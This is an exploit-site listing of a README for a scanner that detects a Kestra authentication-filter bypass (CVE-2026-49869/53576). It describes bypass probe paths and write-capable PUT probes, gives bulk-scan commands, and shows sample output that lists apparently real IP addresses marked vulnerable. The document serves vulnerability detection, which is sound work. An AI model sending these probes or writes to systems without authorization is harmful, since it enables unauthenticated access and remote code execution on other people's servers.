Exploit for CVE-2026-49869 CVE-2026-49869 CVE-2026-53576

Name: Exploit for CVE-2026-49869 CVE-2026-49869 CVE-2026-53576
Rating: 5 (3 reviews)
2026-06-30 | CVSS 10.0
## https://sploitus.com/exploit?id=47950A77-F41D-5310-A96F-B4B94D1E4D2F
# Kestra CVE-2026-49869 / CVE-2026-53576 Scanner

Scans Kestra instances for the `endsWith("/configs")` authentication filter bypass. Kestra's `AuthenticationFilter.java` checks `request.getPath().endsWith("/configs")` instead of matching the exact path `/api/v1/configs`. Since Kestra addresses resources via caller-chosen path segments (namespace, flow ID), any path ending in `/configs` bypasses Basic-Auth enabling unauthenticated flow creation and RCE. (CVSS 10.0)

**References:** [GHSA-5vc5-wxxq-3fjx](https://github.com/kestra-io/kestra/security/advisories/GHSA-5vc5-wxxq-3fjx) · [TP-2026-009](https://turingpoint.de/en/advisories/tp-2026-009/) · [CVE-2026-49869](https://vulners.com/cve/CVE-2026-49869) · [CVE-2026-53576](https://vulners.com/cve/CVE-2026-53576)

## Detection Logic

1. **Liveness check** `GET /api/v1/configs` (must return 200 to proceed)
2. **Auth check** `GET /api/v1/{tenant}/flows` (should return 401/403 if auth is enforced)
3. **Bypass probes** 5 GET requests to paths ending in `/configs`; if any returns non-401/403 while the auth check enforces, the instance is vulnerable
4. **Aggressive mode** (`--aggressive`) also sends PUT requests to confirm write-bypass ability

### Probe Endpoints

| Probe | Method | Path |
|---|---|---|
| Flows | GET | `/api/v1/{tenant}/flows/{namespace}/configs` |
| Executions | GET | `/api/v1/{tenant}/executions/{namespace}/configs` |
| KV store | GET | `/api/v1/{tenant}/namespaces/{namespace}/kv/configs` |
| Dashboards | GET | `/api/v1/{tenant}/dashboards/configs` |
| Logs | GET | `/api/v1/{tenant}/logs/{namespace}/configs` |
| Flows PUT | PUT | same as Flows (creates a minimal flow) |
| KV PUT | PUT | same as KV (creates a KV entry) |

## Usage

```bash
# Single target
python main.py http://target:8080

# With explicit port (skips auto-expand)
python main.py http://10.0.0.1:8080

# Bulk scan
python main.py -f targets.txt

# Bulk scan with JSON output
python main.py -f targets.txt -j -o report.json

# Aggressive mode (PUT probes)
python main.py -f targets.txt --aggressive

# Custom tenant (older Kestra uses "default")
python main.py http://target:8080 --tenant default

# Custom thread count
python main.py -f targets.txt --workers 20

# Custom auto-ports
python main.py -f targets.txt --auto-ports 8080 9090

# Verify TLS
python main.py https://kestra.example.com --verify-ssl
```

### Input File Format

```
# Comment lines ignored
103.112.186.15:8080
http://103.112.186.15:8080/ui/
https://kestra.example.com
103.112.186.24           # No port → auto-expanded across common ports
```

Lines without a port are auto-expanded across `[8080, 8081, 8088, 8091, 80, 443]`.

## Output

### Single Target

Full per-probe breakdown with verdict:

```
====================================================================
  Target:    http://10.0.0.1:8080
  Timestamp: 2026-06-30T12:00:00+00:00
====================================================================

  [Flows Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/flows/tutorial/configs
    Status:       200
    Bypass:      YES

  [Exec Bypass]
    URL:         http://10.0.0.1:8080/api/v1/main/executions/tutorial/configs
    Status:       404
    Bypass:      No

  ...

  [VULN]  Verdict: VULNERABLE ...
```

### Bulk Summary

Sorted columnar table (vulnerable first, then inconclusive, then safe):

```
====================================================================================================================
  BULK SCAN SUMMARY   GHSA-5vc5-wxxq-3fjx
====================================================================================================================
  #    Target                              Auth    Flows    Exec     KV      Dash    Logs    Status
  ----------------------------------------------------------------------------------------------------
  1    http://173.249.1.26:8080            401     404      ERR      ERR     ERR     405     VULNERABLE
  2    http://207.180.207.199:8080         401     404      ERR      ERR     ERR     405     VULNERABLE
  ...
  30   http://103.115.65.228:8080          401     401      ERR      401     ERR     401     SAFE
  ...
====================================================================================================================
  Total: 258  |  Vulnerable: 5  |  Safe: 29  |  Inconclusive: 224
====================================================================================================================
```

Exit codes: `0` = no vulns, `1` = vuln found, `2` = all inconclusive.

## Installation

Requires Python 3.10+.

```bash
pip install -r requirements.txt
python main.py --help
```

## Disclaimer

For **authorized defensive testing only**. Always obtain proper written authorization before scanning systems you do not own.